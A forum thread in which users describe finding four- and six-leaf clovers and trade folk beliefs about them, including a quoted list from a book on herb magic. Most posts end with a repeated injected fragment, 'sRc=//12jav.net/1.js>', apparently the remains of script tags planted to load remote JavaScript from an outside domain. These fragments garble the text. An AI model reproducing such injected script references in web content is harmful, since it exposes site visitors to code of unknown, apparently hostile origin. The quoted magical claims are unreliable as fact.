Clovers

Earlier today I found a four-leaf clover. Upon continuining looking in the same patch of clover I found a six-leaf clover. I realize four-leafs are associated with good luck and I know the biology behind them. But does any one have any idea any patrician association to a six-leaf aside from the genetic codings? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I thought it was a five-leaf clover until I looked at it more closely and noticed it to be a six-leaf. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Wow! Since I was a child, I've searched for a four leaf clover and could never find one. I imagine that a 5 or 6 leaf clover would be all the more lucky.

I found a chacha answer to the meaning of a five leaf clover just now that stated the same thing
"According to legend, Five-leaf Clovers bring extra good luck and attracts money. They are even rarer than four leaf clovers."

I really don't know about a six leaf clover. I'm guessing the luck gets stronger as the leaves multiply =) sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I talked it over with my mother who was there when I found it and we figured it meant extra luck. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

And also a total of five four-leaf clovers and one six-leaf clover was found in the same patch. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

The following information was pulled from Cunningham's Encyclopedia of Magical Herbs (2nd edition) on magical uses/meanings of clovers. (highly recommended book for anyone interested in herb magic)

"TWO LEAVED:
If you find a two-leaved clover, you shall soon also find a lover.

THREE-LEAVED:
Trefoil, or the three-leaved clover, is worn as a protective amulet.

FOUR-LEAVED:
The four-leaved clover, if worn, helps men avoid military service. It also protects against madness, strengthens psychic powers, enables you to detect the presence of spirits, and leads the wearer to gold, money, or treasures. If two people eat a four-leaved clover together, mutual love will result. Seven grains of wheat laid on a four-leaved clover will enable one to see fairies. If you put a four-leaved clover in your shoe before going out you will increase your chances of meeting a rich new love.

FIVE-LEAVED:
The five-leaved clover is powerful for attracting money, and should be worn for this purpose.

WHITE-CLOVER:
White clover is used to work against hexes, and is worn or scattered around the premises for this.

RED CLOVER:

I have heard of people drying a four leaf clover, grinding it and putting it a cup of tea for good luck and protection though I couldn't tell you if it works or not. I might try it because I found two four leaf clovers in my yard. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
